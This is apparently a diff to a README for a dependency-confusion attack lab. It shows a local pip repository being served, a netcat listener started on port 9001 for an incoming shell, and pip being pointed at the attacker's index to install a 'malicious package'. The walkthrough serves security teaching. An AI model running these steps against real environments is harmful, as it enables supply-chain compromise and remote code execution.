zinzloun/Infosec-Scripts-Stories/dep-con/README.md

     ~/piprepo.local$ python3 -m http.server
     Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

 Now we have to trick pip to get our malicious package, we can just update pip-install-test, saying to pip to look in our local repo for the new version.
-Before that start a nc listener:
+Before to proceed start a nc listener:

      nc -lvp 9001
     listening on [any] 9001 ...

-Then from the virtual enviroment proceed to update the package:
+Then from the virtual enviroment perform the package update:

     (dep-conf) user@xxxxx:~$  pip3 install pip-install-test --trusted-host <your_hostname> --index-url http://<your_hostname>:8000 -vv -U
     ...